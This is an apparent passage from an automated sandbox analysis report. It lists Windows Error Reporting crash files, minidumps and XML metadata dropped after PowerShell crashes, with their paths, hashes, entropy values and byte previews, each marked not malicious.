                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.6.2.4.2.6.6.7.5.4.2.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.5.0.0.1.5.3.2.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.8.4.c.b.b.f.-.5.0.c.5.-.4.9.0.4.-.b.4.9.6.-.7.b.8.9.6.f.3.8.1.c.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.f.4.-.0.0.0.1.-.0.0.1.5.-.e.2.a.d.-.5.e.8.1.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_811181b0-5835-4638-92f6-9433f0ac2c6a\Report.wer

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.5344534618272417
                          Encrypted:false
                          SSDEEP:96:YvFajurxYidmRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAGSf/VXT5NHBx:2yumGmR30wAAzuiFs+Z24lO8
                          MD5:5F2B9E752649241C6C3D599C94CAD7F5
                          SHA1:769E1B4F2B5A978DAA4A9EA5178931C4EEA857C0
                          SHA-256:3A45FB6BDE81EC109E97FDB3AE01596EFEEB7FF8AF72CF8A61BC4584B265C336
                          SHA-512:FE54DBA2629F1899600A1E661CD3AA9EAF83F84A5A95A0217F5D6871E22D80E31C30C922A24C5F4EC9C394820F1238C6C56963296AF7C8C6AF37219FF3019AD3
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.6.7.3.1.3.4.9.3.4.5.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.6.7.1.8.6.8.1.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.1.1.8.1.b.0.-.5.8.3.5.-.4.6.3.8.-.9.2.f.6.-.9.4.3.3.f.0.a.c.2.c.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.b.8.-.0.0.0.1.-.0.0.1.5.-.0.f.e.2.-.2.a.8.b.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\Critical_powershell.exe_b4b21b9272f0623778607a435112f88140f556cc_00000000_90979711-5288-4b3a-abc8-1f7b30f493c7\Report.wer

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.5342760306769446
                          Encrypted:false
                          SSDEEP:96:6RbFhjEirxYidNRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTADf/VXT5NHn:OXEimGNR30wAAzuiFjZ24lO8
                          MD5:A2FFD365EAB9DC0E69F05F755D5318E7
                          SHA1:62D7F8491E5A20B6741E9946D09083081E401E11
                          SHA-256:E1E929C651F4078BC2AC60DB4389CDD99B1A5B985C59B21DA958BEE5A3833415
                          SHA-512:615CC733512283BCA6268859364FA67F576ABF8706B53150C5972D9B39C09DBDFAD5AAC719B652CE555F44E5CF12A813C7A629AC4312E2C93CF295D8816A8D8C
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.6.2.0.5.9.0.5.6.7.1.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.1.9.9.9.9.0.7.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.7.9.7.1.1.-.5.2.8.8.-.4.b.3.a.-.a.b.c.8.-.1.f.7.b.3.0.f.4.9.3.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.8.c.-.0.0.0.1.-.0.0.1.5.-.d.5.b.e.-.b.0.6.e.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A88.tmp.dmp

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:03:53 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):251258
                          Entropy (8bit):3.9196673399820092
                          Encrypted:false
                          SSDEEP:1536:cpQ/mAcFdhACDytTz2IGmkxIJX67uBojRGapN4uE2aOdSVXI4WNxLTgXJ+p:cplNs2IGmkOJKVGc4uEqdyoLTgXJ8
                          MD5:C206CE51ECD18B75AD5B171ADC4BF40F
                          SHA1:42FBB8A4B31A552C715D957F49E20660917D7DBF
                          SHA-256:6872CBB00A2822541603F4BC4B6E8A52918D493204A607F9B6E7D0A835E4EFA5
                          SHA-512:251A83113360BB1B7D5B41077AF0A0EE65F8DA4F86C50D56EAAF3CFA7D783F295B64F471342779CC61FE9B9DAD2B199A9417E9C16CC442D4DF7EB4B0214DC86F
                          Malicious:false
                          Preview:MDMP..a..... ..........f....................................<...P.......d ...C..........`.......8...........T............)..........................x ..............................................................................eJ.......!......GenuineIntel............T.......4......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BD1.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8376
                          Entropy (8bit):3.691196671420639
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJMO6pa6YqxSU6lAfgmfZBo2prT89bvOsfqlm:R6lXJd6E6YkSU6l4gmf/o3vNfx
                          MD5:0ECCF0E476D97EF1A9E703D8DC2CEAEA
                          SHA1:A13EE035CEAA83998F728037247F8B1246CD8057
                          SHA-256:1ADC2DE7755AEB791879506265423D9537CDBFB338FB30D4A1F182715A2EF7CE
                          SHA-512:30F459BC659E831E3CA198545C260216DDC109DD31336FD0014A4A6C40CB43FD79E1C880A274E0A6492E4E0FD9022A4CA0D1BB1E13881485E1E3B888AEFA7993
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.5.2.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BFF.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7416
                          Entropy (8bit):3.68255645121321
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbKWZdd6f6YDwp9XgmfHNV9rewSS5aMFp0lm:R6l7wVeJKWZdAf6YDwp9Xgmftq0polm
                          MD5:39CC0E1214A82851DF795231EDD3A64D
                          SHA1:30DB15BCA78FE0DE810875B017392F346E2DE6C3
                          SHA-256:775285FE21DF9D34D92447146E89033FFA84E96C6C754242A2A9AB88B232AFFA
                          SHA-512:1A43DD49FBB60E4055C62956FF343AB55A0487195AAF78738D057CFE2418E385924CCB04430B5AE7A74720B5119158BDCA9429FA9F70CED17D73F7AC2B6FF9B4
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.5.6.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C3E.tmp.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.566996402559338
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg771I9GhWpW8VYyYm8M4JFKlnOtSFvyq8vT0Otgytfad:uIjfOI79w7VGJFKlndWT0hufad
                          MD5:3F913D99A24997098E0A455C63F72BEA
                          SHA1:23985AA9A395DCF3CD6866B43C49166E04A1DE57
                          SHA-256:F35E92A0FFA9171B468CAC91B30CF303E9F108B7FC5030213265C1F9F3DEFA22
                          SHA-512:220F4063D048EFB7F48C63C36958B504FDE2447327D101B3147FA99EF02CCADAC5B44DCE8E5DD40A855EF4EDCC18A8C6E504AB17ADED1D90AA475638B75CCD96
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C3F.tmp.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.461547743504096
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg77aI9GhWpW8VYQ5Ym8M4JSDuFJ+q8vMDVmLod:uIjfOI7ow7VsJXKWmLod
                          MD5:0968A1853C5115FEF8BFC4CEDF946B4C
                          SHA1:4BAAFF9304AFEBA3117AE055E6BD0AF66E905329
                          SHA-256:5F0F6B23441E077AA09917564F2E6458B42B4161489ED49210B227B97D7E5D28
                          SHA-512:51953E5B48687C3150D5943B0F385C1FB848A34C495B2093C42C6B23E007698104100C5AE7BC767985189A17CC2B7230FDD4DCB49C52754E00659ACEA8A5FBE8
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER69C3.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7416
                          Entropy (8bit):3.683095336272134
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJDahlC6YDmxzMNGgmftq0pFDudm:R6lXJehlC6YCFgmftqMV
                          MD5:94FFBE67C469701A19916433BFD86487
                          SHA1:FF2BE5BB1C1D4AED9BD086FEC40829FD8944E0EC
                          SHA-256:472E72636028264B59472312D3440CA3C7B045E1D10DE321ED558C203058B582
                          SHA-512:42BDD3856735BB5DF51D929694AE62B3DB2325AEE3A280A802A10E40AE82BB5F44EE13B0516AA36D20AEDCC5B917FE80070D51781F8CBA6F7FFD412F4C50D10E
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.4.8.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER69E3.tmp.dmp

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:04:09 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):239770
                          Entropy (8bit):4.055539217847546
                          Encrypted:false
                          SSDEEP:1536:r4xKYAD3a4cSJCDgKIGVtTjYI2guBojRLapN4uE2aOQSVXR60ILTgHC8PY:r4sag0DYBELc4uEqQyMtLTgHr
                          MD5:DB331FF446BFF181BD612BA1289FB3AB
                          SHA1:BF97A4164BC731FF493CF8D062F440ED19C185A0
                          SHA-256:B51DA3AD522B7C2D1051120E9BA507E0FEC28F3E99F9B7B19660C8660A16D32B
                          SHA-512:26C46EFCDDEB2768368CEF452583EC59A7422DBCF0B3FBA3637B2E4400E8516FEB87E3A5AA36680FF2957B42BA545EE6CE3127C50F42A981E57633B9EAFDB5AB
                          Malicious:false
                          Preview:MDMP..a..... ..........f....................................<... ........ ...@..........`.......8...........T............)...~..........\...........H ..............................................................................eJ....... ......GenuineIntel............T.......`......f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER69F3.tmp.xml

                          Download File
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.566785023658872
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg771I9GhWpW8VYgYm8M4JFKlnOtSFz2eyq8vT0OtAytfPd:uIjfOI79w7VMJFKlnceWT05ufPd
                          MD5:B20F98130DB13617AE4D9EF330809C3E
                          SHA1:B69CA037C35EC41DE9A770ADDA07B751C3F98B38
                          SHA-256:1DE74B33B397A29448AA0B61D5D56F249572B5A4917DC2249B51507C3A2ABC7D
                          SHA-512:E507C166D2AB393FBC8FC402D9CDBFB7C2175B1954B4BAE9B55BD702ADE16CE508996BB21187B57F44DC1B6662698A6E8C13FD08A875449D5DB852DA5A22755C
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B99.tmp.WERInternalMetadata.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8378
                          Entropy (8bit):3.6904838644444777
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJp3jQ6l6YjISUdNygmfZBo2prj89bnhsf4tm:R6lXJpTQ6l6YsSUdNygmf/oHnafv
                          MD5:AE319CC294955C96AA0BE46068F9CA12
                          SHA1:F26BA78187711D4D638609CF2C6928033F08DDFD
                          SHA-256:008240F61C4DA258D3EBC2DBE7EF39E8BF62627C953C04B0F78D414334161FD2
                          SHA-512:1461258A4E56BDF7A3F7CCD3D28BDC416D18154C8ED076211713332E019291B5174011B9FDD3ABF3B037F098DC0940943AF4B62BF515C70EEFCB76C459367BFF
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.8.4.<./.P.i.

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BC9.tmp.xml

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.461466537207372
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg77aI9GhWpW8VYuYm8M4JSDuFv+q8vMD5mL0d:uIjfOI7ow7V2JtK6mL0d
                          MD5:2D01C70A214DA3E24DEE308CD8893392
                          SHA1:E6EE62858252782B49A4785BFB918952C872EF15
                          SHA-256:B50DF2CC77AC0D4E952341318085454137AC945F8651F7D6DA92AFEF3D794C2E
                          SHA-512:95D5B1FB11F3CF281075C35854FA2AE0BD45F82BF4A0FB43C899A3150EE2F03A45938157F298E50A4AEEFF8C13E125F62EAAD9A5AB3147CBA59F10B859056F77
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERABFD.tmp.dmp

                          Download File
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:04:26 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):241182
                          Entropy (8bit):4.062833987854387
                          Encrypted:false
                          SSDEEP:3072:mmplY44jdGJQk2rWB6D/mVgc4uEqcyYLTg8:mY244FSgc4lyOTg
                          MD5:1B18944FC32D26FBE18A3C3C33BA01DD
                          SHA1:C90C7723F8DA5896C844D7CF7F6E1E322CACC6C1
                          SHA-256:E5B5361E771599BC704E4E3828FD59123A3809E3E4A309A75F452C6C5AE21433
                          SHA-512:433BC30AB3FBD489DD002C0D0AB2488A7973C21590CBE5F6B2246A073BC95B7F88A731DF292CFB939FEDB4048891DD9A78DC2D524D7E56D0E984CC83F177C3D9
                          Malicious:false
